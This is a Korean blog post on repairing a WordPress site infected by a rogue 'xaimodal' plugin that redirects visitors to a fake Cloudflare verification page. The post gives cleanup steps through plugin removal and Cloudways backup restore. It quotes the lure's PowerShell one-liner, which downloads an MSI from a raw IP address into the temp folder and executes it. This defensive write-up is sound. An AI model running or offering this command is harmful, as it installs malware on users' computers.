워드프레스 "CloudFlare" 로봇 증명하라고 계속 나올 때 해결 방법

갑자기 내 워드프레스를 접속하면 “CloudFlare” 로봇이 아님을 증명하라는 사이트로 연결되었습니다.

보안이 강화되었나? 로봇이 아님을 증명하면 접속이 되겠지?

하고 접속하면 내 PC에 무언가를 복사해서 붙여넣으라고 메시지가 나옵니다.

결론은 내 워드프레스 사이트가 악성코드 또는 알 수 없는 외부 플러그인이 설치됐다고 의심해야됩니다.

워드프레스 CloudFlare 로봇 증명 증상

⬇ 아래와 같이 정상적으로 내 워드프레스 사이트 주소를 입력해도 홈페이지가 아닌 CloudFlare 증명 웹사이트로 “강제 이동“됩니다.

⬇ 그리고 다른 웹사이트에서 보지 못하던 내 PC에 특정 명령어를 복사/붙여넣기를 요구합니다.

위 사진을 번역해보니 해당 웹사이트에서 제공하는 코드를 내 PC에 실행창에서 붙여넣기를 하라는 것입니다.

결론은, 악성 코드 또는 멀웨어 바이러스를 내 PC에 주입해서 개인 정보 또는 결제 정보를 해킹하려는 아주 못된 수작이였습니다.

⬇ 해결 방법

일단 1번 방법은 FTP 연결을 하기 위해 “파일질라” 를 통한 접속이 필요합니다. FTP 접속해서 플러그인 제거 방법은 초보자에겐 번거럽고 어렵기 때문에 하단의 방법도 있네, 라고 봐주시면 되겠습니다.

방법1. 내 워드프레스 관리 웹사이트 접속 후 플러그인 확인 후 제거

내 워드프레스 관리 웹페이지 접속해주세요.

⬇ 관리웹사이트 > 플러그인 > 설치한 플러그인 이동

⬇ 아래와 같이 “xaimodal~” 으로 시작되는 설치하지 않은 플러그인이 보인다면 삭제해주세요.

“xaimodal~” 으로 시작 되는 플러그인은 CloudFlare 로봇 증명 웹사이트를 강제 연결해주며 CloudFlare에서 뿌리는 악성코드는 아래와 같습니다.

⬇ 아래 코드는 악성코드를 파워쉘 명령어를 통해 내 pc에 설치되는 구조입니다. temp 폴더 안으로 침투되게 되있네요. 아래 코드는 제가 수정해서 제대로 동작하지 않으니 괜찬습니다.

powershell -c "Invoke-WebRequest -Uri 'http://91.247.36.3/' -OutFile "%temp%\immunewait.msi" -UseBasicParsing; Start-Process "%temp%\immunewait.msi""

“xaimodal~” 의 플러그인을 삭제 후 내 워드프레스에 다시 접속해보세요. CloudFlare 강제 연결이 되지 않고 정상적으로 내 블로그에 접속된다면 해결입니다.

클라우드웨이즈 이용자는 기본으로 제공하는 백업 / 복원 기능을 사용할 수 있습니다. 매일 정해진 시간에 백업이 진행되고 있기에 여러분의 워드프레스 웹사이트 접속 불가 하루 전으로 돌릴 수 있습니다.

⬇ 클라우드 웨이즈 접속 > My Applications 클릭

⬇ 접속이 안되는 워드프레스 웹사이트 클릭

⬇ backup and restore > 복원 시점 선택 (하루전) > restore application now 클릭

⬇ 아래 3가지의 메뉴 원하는 옵션을 선택합니다. 저는 플러그인 복원인 “database” 복원 메뉴를 진행하여 복구하였습니다.

⬇ 일정 시간(3~5분) 후 복원이 완료됩니다. 이 후에 내 워드프레스에 접속해보세요.

이렇게 내 워드프레스에 갑자기 접속이 안될 때 클라우드웨이즈 사용자는 제공되는 복구 옵션을 통해 간편하게 복원할 수 있습니다.

매일 백업이 진행되기에 여러분의 글 발행 날짜를 확인하시고 원하는 날짜에 복구를 진행하면 됩니다.

결론은 악성코드로 인해 내 워드프레스가 접속이 안된다면 당황하지 말고 관리자 페이지에서 불필요한 플러그인 확인 또는 클라우드 웨이즈를 통해 간편하게 복구해보세요.